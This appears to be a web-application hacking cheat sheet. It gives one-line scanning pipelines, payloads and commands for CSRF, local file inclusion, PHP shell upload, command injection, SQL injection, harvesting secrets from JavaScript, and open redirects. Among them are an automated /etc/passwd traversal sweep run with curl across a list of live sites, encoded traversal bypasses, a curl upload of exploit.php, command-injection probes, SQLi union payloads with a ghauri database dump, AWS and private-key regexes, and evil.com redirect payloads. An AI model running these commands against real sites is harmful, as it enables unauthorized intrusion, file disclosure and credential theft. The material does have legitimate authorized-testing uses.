Vulnerability Testing Techniques

Purpose: Test for unauthorized state-changing requests in web applications.

Detection:

cat live_websites.txt | gf csrf | tee csrf_endpoints.txt

Manual Testing Steps:

Identify forms and state-changing endpoints.Check for the presence of CSRF tokens.Test token validation mechanisms.Attempt bypass techniques such as token reuse or header manipulation.

Purpose: Identify vulnerabilities that allow file inclusion to read sensitive files.

Detection:

cat live_websites.txt | gf lfi | qsreplace "/etc/passwd" | xargs -I@ curl -s @ | grep "root:x:" > lfi_results.txt

Common Payloads:

# Basic traversal
../../../etc/passwd
# Null byte bypass (PHP < 5.3)
../../../etc/passwd%00
# Double encoding
..%252f..%252f..%252fetc%252fpasswd

Purpose: Detect and exploit vulnerabilities to execute arbitrary code remotely.

Upload Testing:

curl -X POST -F "file=@exploit.php" https://target.com/upload

Command Injection Test:

# Basic tests
;id
|id
`id`
$(id)

Purpose: Detect SQL vulnerabilities to access or manipulate the database.

Automated Testing:

ghauri -u "https://target.com?id=1" --dbs --batch

Manual Testing Payloads:

'
' OR '1'='1
' UNION SELECT NULL--
' UNION SELECT @@version--

Purpose: Identify exposed sensitive data such as API keys or credentials.

JavaScript Analysis:

cat js_files.txt | grep -Ei "key|token|auth|password" > sensitive_data.txt

Common Patterns:

# API Keys
[A-Za-z0-9]{32}
# AWS Keys
AKIA[0-9A-Z]{16}
# Private Keys
-----BEGIN [A-Z]+ PRIVATE KEY-----

Purpose: Test for vulnerabilities that redirect users to malicious URLs.

Detection:

cat urls.txt | grep "=http" | qsreplace "https://evil.com" | xargs -I@ curl -I -s @ | grep "evil.com"

Test Payloads:

https://evil.com
//evil.com
\/\/evil.com
%2F%2Fevil.com

Steps to reproduce.Impact assessment.Affected endpoints.Proof of concept.Suggested fixes.

Exploitability.Technical impact.Business impact.Required access level.Complexity of exploitation.